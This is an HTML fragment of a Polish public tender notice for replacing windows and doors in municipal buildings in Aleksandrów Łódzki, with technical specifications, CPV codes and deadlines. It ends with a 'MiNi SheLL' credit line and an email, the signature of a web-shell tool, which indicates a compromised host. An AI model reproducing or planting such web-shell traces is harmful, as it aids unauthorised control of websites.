<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana stolarki okiennej  na okna drewniane w budynkach administrowanych przez Zamawiającego w Aleksandrowie Łódzkim, w ilości 34 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okna drewniane jednoramowe z zespoloną szybą, podwójne. Okna winny być montowane w starej ościeżnicy okiennej skrzynkowej. Należy wykonać opaskę z listew szer. min. 10 cm wokół ościeżnicy, w zależności od potrzeb. Okna w kolorze białym. Przy oknach o wysokości powyżej 1,4 m należy zamontować baskwil pod listwą przymykową. Montaż okien winien być wykonany poprzez zakotwienie minimum 4 haków i doszczelnienie piankę poliuretanową. 
Zakres prac:
a)	demontaż starych okien,
b)	montaż nowych okien poprzez zakotwienie minimum 4 haków i wypełnienie pianką poliuretanową
c)	wykonanie obróbek ościeży (w różnym zakresie dobranym indywidualnie do każdego okna), oceny wymaganego zakresu prac oraz dokładnego obmiaru własnego należy dokonać na miejscu,
d)	montaż nawietrzaków okiennych ramowych na wszystkich oknach,
e)	montaż parapetów zewnętrznych przy wszystkich oknach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.22.11.00-6, 45.42.11.32-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wymiana stolarki drzwiowej na drzwi drewniane w budynkach administrowanych przez Zamawiającego w Aleksandrowie Łódzkim, w ilości 46 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drzwi - konstrukcja: ramiak drewniany sosnowy 120x43 mm,  podwójnie obłożony klepką drewnianą 60x12 mm, wypełnienie pomiędzy klepkami styropianem o grubości 20 mm i folią paraizolacyjną, współczynnik przenikania ciepła U=1,5 W/(m2xK). Ościeżnica sosnowa  o przekroju 100/120x52 mm z uszczelką we wrębie i progiem. Wyposażenie 3 szt. zawiasów regulowanych, wizjer, zamek wpuszczany zapadkowo- zasuwowy z kompletem kluczy, klamka z szyldami. Malowanie: farby kryjące lub impregnaty i lakierobejce, drzwi zewnętrzne: impregnaty i dwukrotne malowanie lakierami.
Zakres prac:
a)	 demontaż starych drzwi,
b)	 montaż nowych ościeży drzwiowych oraz regulacja skrzydeł drzwiowych,
c)	 wykonanie obróbek ościeży drzwiowych zaprawą tynkarską oraz zagruntowanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.22.12.00-7, 45.42.11.31-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wymiana drzwi drewnianych na drzwi stalowe w budynkach administrowanych przez Zamawiającego w Aleksandrowie Łódzkim, w ilości 13 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drzwi - skrzydło drzwiowe wzmocnione kształtownikiem z profilu typu C 43 mm o grubości ścianki 1,2 mm, obłożone blachą stalową odtłuszczoną - grubość 1,2 mm, wypełnienie pomiędzy blachą styropianem o grubości 40 mm współczynnik przenikania ciepła U=1,1 W/(m2xK). Uszczelka po obwodzie skrzydła drzwiowego. Naświetla wykonane z szyby bezpiecznej, podwójnie klejonej o wymiarach 30 x 60 cm w ramie z uszczelką. Ościeżnica z profilu uchowego o wymiarach 40 x 50mm z progiem stalowym. Mocowanie ościeży za pomocą prętów metalowych 10 wbijanych w mur i łączonych z ościeżnicą za pomocą spawu. Wyposażenie: zawiasy toczone  20 - 2 szt., zamek wpuszczany typ Yale z kompletem kluczy, klamka z szyldami, samozamykacz. Malowanie dwukrotne farbą poliwinylową (podkład i nawierzchniowa). 
Zakres prac:
a)	demontaż starych drzwi,
b)	montaż nowych ościeży drzwiowych poprzez zakotwienie haków i wypełnienie    pianką poliuretanową oraz regulacja skrzydeł drzwiowych,
c)	wykonanie obróbek ościeży drzwiowych zaprawą tynkarską oraz zagruntowanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.22.12.00-7, 45.42.11.31-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com